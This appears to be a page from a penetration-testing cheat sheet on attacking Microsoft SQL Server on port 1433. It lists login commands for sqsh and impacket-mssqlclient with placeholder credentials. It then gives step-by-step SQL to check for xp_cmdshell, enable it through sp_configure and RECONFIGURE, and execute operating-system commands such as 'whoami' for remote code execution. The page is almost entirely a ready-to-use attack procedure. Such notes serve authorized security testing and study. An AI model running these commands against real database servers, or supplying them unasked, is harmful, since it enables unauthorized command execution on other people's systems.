1433 - MSSQL

Gold mine:

  1. Login: sqsh -S <IP> -U <username> -P "<pass>"

  2. Login: sqsh -S <IP> -U .\\<Username> -P <pass> -D <database>

  3. Login: impacket-mssqlclient :<username>:<pass>@<IP> -windows-auth

  4. Login: impacket-mssqlclient :<username>:<pass>@<IP> -local-auth

xp_cmdshell -> RCE

sqsh -S <IP> -U <Username> -P <Password> -D <Database>

In sqsh, you need to use GO after writing the query to send it
Do one by one each command:

# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE

# This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'
Previous3306 - MYSQLNextShells

Last updated

Was this helpful?